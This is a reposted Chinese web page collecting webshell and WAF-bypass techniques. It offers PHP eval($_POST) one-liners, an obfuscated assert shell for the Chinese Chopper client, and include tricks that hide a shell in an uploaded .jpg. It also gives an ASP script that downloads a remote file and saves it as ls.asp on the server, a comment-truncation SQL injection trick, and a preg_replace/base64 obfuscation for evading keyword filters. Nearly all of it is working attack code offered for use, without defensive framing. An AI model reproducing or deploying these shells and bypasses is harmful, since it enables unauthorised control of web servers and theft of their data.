一、马儿篇
—————-1号————————–
1
2
3
|
<?php
@eval
($_POST[’1′]);?>
|
—————-2号————————–
1
2
3
4
5
6
7
|
<title>login</title>nono<?php
eval
($_POST
[1])
?>
|
——————–3号————————
1
2
|
<?php $a = str_replace(x,“”,“axsxxsxexrxxt”);
$a($_POST[“c”]); ?>
|
菜刀直接连,不需要构造连接字符串,密码 c
——————–类似于过安全狗的包含方法——————————————-
A.asp版本:
将一句话保存为 XX.jpg 上传后 地址为 …/xxxxxx.jpg
在上传一个 x.asp 内容为 <!–#include file=”../xxxxxx.jpg”–>
B.php版本
如果是php的话:
<?php
include “1.htm”;
?>
——————实在不行,还可以下载——————————————————
远程下载马
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,“http://www.91ri.org/ 123/1.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“ls.asp”),2
set sGet = nothing
set sPOST = nothing
%>
|
—————————————————————
二、注入篇
1
2
|
/*%00*/截断符
select/*%00*/* from admin;
|
—————————————————————
三、规则篇
可以利用类似:
1
2
3
4
5
6
|
<?php
$code=‘一串base64′; //base64编码
$x=str_replace(‘f’,“”,“bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换
$a = ‘/a/’;//正则规则
preg_replace($a,‘e’.‘v’.‘a’.‘l’.‘(‘.$x.‘(‘.$code.‘))’,‘a’); //正则替换
?>
|
方法绕过关键词过滤
转自:http://fuck.0day5.com/?p=227
http://www.waitalone.cn/post/HWS_Bypass.html
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号